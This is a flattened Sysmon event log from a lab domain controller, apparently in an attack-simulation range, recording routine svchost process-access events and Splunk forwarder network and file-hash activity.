14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203122Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203121Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203120Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203119Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203118Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203117Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203116Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203115Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203114Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203113Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203112Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203111Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203110Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203109Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203108Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203107Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203106Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203105Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203104Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203103Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203102Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203101Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:25.628{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002203136Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:23.027{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60695-false10.0.1.12-8000- 23542300x80000000000000002203135Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:26.234{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB54F73E433A242EE8199B63730D4FA2,SHA256=E7338FF0C9F9446D61F44825C213139B7167E011D274FFA62FE6B7301FFFF78D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203134Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:26.030{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B4405D14288DE51FCD666AA6F6F8D1B,SHA256=D8244DA705ED1CAF28E6AB66744EC56872806EFA69839327CB3D9B1177426E7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203137Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:27.077{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DE8A470B92C49F9DD0B763EB828C57E,SHA256=1E56446246697BC60649C4DF3DD17A13DFB48EFDF6A09D2CAD3C9C3F1D26C6EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203138Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:28.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09E0EDE69BCF89A0AF05EE80FA419467,SHA256=7BE27E74FF009D89034C48BB4903869FD48184A87B073E09FB14499BAB730111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203139Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:29.299{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CE056B0F3BA67DFFCB029F970E33D43,SHA256=2D30EA462477B24A10A16B500F79BC64B3D92B2E1E69C9ADB198F6A02C5E818D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203140Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:30.315{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34205596ECE20D5E173D7379B3E4B1E8,SHA256=525705EEA1F227FEA66E30A2B48F921D846C6E8402CD28F4B42E0D76EFD5D37B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203143Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:31.377{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AE9C1DD35F97F187DD4697477F2AE8B,SHA256=7CF6DBEF5028ECE02711FC4874F111D74BA05475D54E25CC7A7CA2C920E07241,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203142Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:31.377{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6E6C03D184156260B69765BC4446372,SHA256=CDE56A5B010E03E2F0273D10F7236FDD5802A0A9EA793C6D9A1FF86A2E678443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203141Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:31.315{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=672DEACE3206E8F0B530E4BE92F5BE95,SHA256=28E7A62866E6EC3E0F4C34FF820927D1C05265ED692547B4F75C57913B8C21CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203145Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:28.057{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60696-false10.0.1.12-8000- 23542300x80000000000000002203144Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:32.315{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD53BCD300D6033F33D37F6298016887,SHA256=D4C516FF49C896F9C7E65BE7B92D49201874533326BA5C00FD9847810BC96ABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203146Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:33.549{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DCB49DA076331CECBF2EE6A32C661DF,SHA256=C4DAB850FC7498C4F56C9254686B7379D1F124004F645593BB491375568E21CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203147Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:34.580{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=084A44FB9920533939E2A96BC975548F,SHA256=DF459127E34C9E7DB57E900A0CAC78E1712A998A5A556935CBE940AF6813992E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203151Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:35.596{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C111AAA629D3841293C620C5C96BF3,SHA256=B34A2005964D6E8285D25DAEF10530DFB24464D2DC210AF619DBB4E8A6445CDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203150Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 